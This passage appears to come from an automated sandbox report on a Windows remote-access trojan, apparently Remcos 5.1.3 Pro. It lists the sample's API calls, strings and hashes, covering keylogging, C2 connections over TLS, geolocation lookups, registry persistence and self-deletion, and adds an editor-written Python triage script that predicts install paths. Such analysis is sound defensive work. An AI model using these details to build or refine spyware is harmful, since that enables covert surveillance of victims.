                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: 8768e4039a2bc5cc6046070fd40f45c4464c342673b2c5d96ea1c9ae7ef072e0
                                              • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                              • Opcode Fuzzy Hash: 8768e4039a2bc5cc6046070fd40f45c4464c342673b2c5d96ea1c9ae7ef072e0
                                              • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                              APIs
                                              • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                              Yara matches
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-1507639952
                                              • Opcode ID: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                              • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                              • Opcode Fuzzy Hash: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                              • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                              APIs
                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,005B41C0), ref: 004338DA
                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                              • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                              • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                              Yara matches
                                              Similarity
                                              • API ID: Name$ComputerUser
                                              • String ID:
                                              • API String ID: 4229901323-0
                                              • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                              • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                              • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                              • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                              • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1


                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                              • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$ErrorLastLocalTime
                                              • String ID: | $%I64u$,aF$0C[$5.1.3 Pro$8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$P[$TLS Off$TLS On $dMG$hhh-AQVE0Z$hlight$name$NG$NG$PG$PG$PG
                                              • API String ID: 524882891-1391770773
                                              • Opcode ID: c7980f48d19d20bc2602edb0b6bf50e77747672025e25e3c16e9fa1a62abbf74
                                              • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                              • Opcode Fuzzy Hash: c7980f48d19d20bc2602edb0b6bf50e77747672025e25e3c16e9fa1a62abbf74
                                              • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID: 0C[$pQG$pQG$xdF$PG$PG
                                              • API String ID: 3795512280-3046255218
                                              • Opcode ID: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                              • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                              • Opcode Fuzzy Hash: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                              • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E


                                              Control-flow Graph

                                              APIs
                                              • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                              • Opcode Fuzzy Hash: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                              Control-flow Graph

                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 0040AD73
                                              • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                              • GetForegroundWindow.USER32 ref: 0040AD84
                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                              • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                              • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                              • Opcode Fuzzy Hash: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                              • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

Control-flow Graph (rendered graph omitted; nodes were marked executed / not executed): function at 0x0040DA6F, basic blocks 0x40DA6F-0x40DC56. Import called: GetLongPathNameW (0x40DBD5). Internal calls to 0x401F86, 0x41C048, 0x43C11F, 0x40417E, 0x402FA5, 0x401F13, 0x401F09, 0x41B645, 0x409092, 0x40DE0C and 0x401F04. The block at 0x40DAE0 calls 0x41C048 and then splits into two near-identical paths (0x40DAE9 and 0x40DB3B) that rejoin at 0x40DAC2.
                                              APIs
                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                              • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                              • Opcode Fuzzy Hash: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                              • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
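Predicting the on-disk install location from the install-path tokens in the String ID above (AppData, ProgramData, ProgramFiles, SystemDrive, Temp, UserProfile, WinDir, \SysWOW64, \system32), as an added triage example; this is editor-written code, not the sample's own routine and not Joe Sandbox output. The token-to-environment-variable mapping, the hypothetical subdirectory and file name, and the rule that WinDir gets \SysWOW64 under WoW64 and \system32 otherwise are assumptions: the report only shows that the WinDir path passes through the IsWow64Process wrapper at 0x41C048 (called from 0x40DAE5 per the subcall note further down) and that both suffix strings are present.

```python
"""Resolve Remcos-style install-path tokens to a concrete directory.

Added example, not code from the analysed sample or from Joe Sandbox.
The token -> environment-variable map and the WoW64 suffix rule are
assumptions drawn from the API/string list in the report."""
import ntpath
from typing import Mapping

# Assumed mapping: which environment variable backs each token.
TOKEN_ENV = {
    "AppData": "APPDATA",
    "ProgramData": "PROGRAMDATA",
    "ProgramFiles": "PROGRAMFILES",
    "SystemDrive": "SYSTEMDRIVE",
    "Temp": "TEMP",
    "UserProfile": "USERPROFILE",
    "WinDir": "WINDIR",
}


def resolve_install_dir(token: str, env: Mapping[str, str], is_wow64: bool) -> str:
    """Return the directory a token expands to under the given environment.

    WinDir gets \\SysWOW64 appended when the process runs under WoW64 and
    \\system32 otherwise (assumed branch assignment). SystemDrive is normally
    just "C:"; a trailing backslash is added so later joins are not
    drive-relative ("C:foo")."""
    if token not in TOKEN_ENV:
        raise ValueError(f"unknown install token: {token!r}")
    base = env[TOKEN_ENV[token]]
    if token == "SystemDrive" and base.endswith(":"):
        base += "\\"
    if token == "WinDir":
        base = ntpath.join(base, "SysWOW64" if is_wow64 else "system32")
    return base


def predicted_install_path(token: str, subdir: str, filename: str,
                           env: Mapping[str, str], is_wow64: bool) -> str:
    """Full path the implant would be copied to for a given token/subdir/name."""
    return ntpath.join(resolve_install_dir(token, env, is_wow64), subdir, filename)


# Constructed sample environment for a 32-bit process on 64-bit Windows;
# not values observed on the analysed host.
SAMPLE_ENV = {
    "APPDATA": r"C:\Users\victim\AppData\Roaming",
    "PROGRAMDATA": r"C:\ProgramData",
    "PROGRAMFILES": r"C:\Program Files (x86)",
    "SYSTEMDRIVE": "C:",
    "TEMP": r"C:\Users\victim\AppData\Local\Temp",
    "USERPROFILE": r"C:\Users\victim",
    "WINDIR": r"C:\Windows",
}

if __name__ == "__main__":
    # "remcos" / "remcos.exe" are hypothetical placeholders for the values a
    # decoded configuration would carry.
    for tok in TOKEN_ENV:
        print(f"{tok:<12} -> {predicted_install_path(tok, 'remcos', 'remcos.exe', SAMPLE_ENV, True)}")
```

Run it with the subdirectory and file name taken from a decoded configuration to get the set of paths worth checking on a suspected host; the WoW64 flag should match the bitness of the process that dropped the file, since that is what IsWow64Process answers.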

Control-flow Graph (rendered graph omitted; nodes were marked executed / not executed): function at 0x0041C482, basic blocks 0x41C482-0x41C515. Imports called: CreateFileW (0x41C4C1), SetFilePointer (0x41C4DE, on one branch only), CloseHandle (0x41C4EA and 0x41C508), WriteFile (0x41C4FB). One branch after CreateFileW (0x41C4CE) exits directly at 0x41C510 without writing; the other optionally seeks (0x41C4D9) and then writes and closes.
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerWrite
                                              • String ID: xpF
                                              • API String ID: 1852769593-354647465
                                              • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                              • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                              • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                              • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

Control-flow Graph (rendered graph omitted; nodes were marked executed / not executed): function at 0x0041B354, basic blocks 0x41B354-0x41B410. Import called: StrToIntA (0x41B3CD). Internal calls to 0x41C048, 0x4135E1 (twice), 0x401FE2, 0x401FD8, 0x406B1C, 0x401FAB, 0x41CFFA and 0x40537D.
                                              APIs
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                              • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 782494840-2070987746
                                              • Opcode ID: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                              • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                              • Opcode Fuzzy Hash: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                              • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                              Control-flow Graph

                                              APIs
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountEventTick
                                              • String ID: !D@$,aF$NG
                                              • API String ID: 180926312-2771706352
                                              • Opcode ID: dc37ff7b83ee0ff2dc7662b81a42dc1c35a371564c17bc36c46a6b8711b8c7cb
                                              • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                              • Opcode Fuzzy Hash: dc37ff7b83ee0ff2dc7662b81a42dc1c35a371564c17bc36c46a6b8711b8c7cb
                                              • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A

Control-flow Graph (rendered graph omitted; nodes were marked executed / not executed): function at 0x0040A6B0, basic blocks 0x40A6B0-0x40A760. Imports called: CreateFileW (0x40A6E6), GetFileSize (0x40A6F5), Sleep (0x40A722), CloseHandle (0x40A729). The graph has a back edge from 0x40A734 to the CreateFileW block at 0x40A6CB, so the open / size check / Sleep sequence runs in a loop. Internal calls to 0x401F04, 0x40B117, 0x409097 and 0x40A1B4.
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                              • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID: XQG
                                              • API String ID: 1958988193-3606453820
                                              • Opcode ID: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                              • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                              • Opcode Fuzzy Hash: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                              • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F

                                              Control-flow Graph

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              • Opcode ID: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                              • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                              • Opcode Fuzzy Hash: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                              • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                              • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                              • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                              • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                              • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                              • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 3360349984-0
                                              • Opcode ID: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                              • Opcode Fuzzy Hash: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                              Strings
Memory Dump Source: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateErrorLastMutex
                                              • String ID: hhh-AQVE0Z
                                              • API String ID: 1925916568-1725776610
                                              • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                              • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                              • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                              • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                              • RegCloseKey.KERNEL32(?), ref: 0041362D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                              • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                              • Opcode Fuzzy Hash: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                              • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                              • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
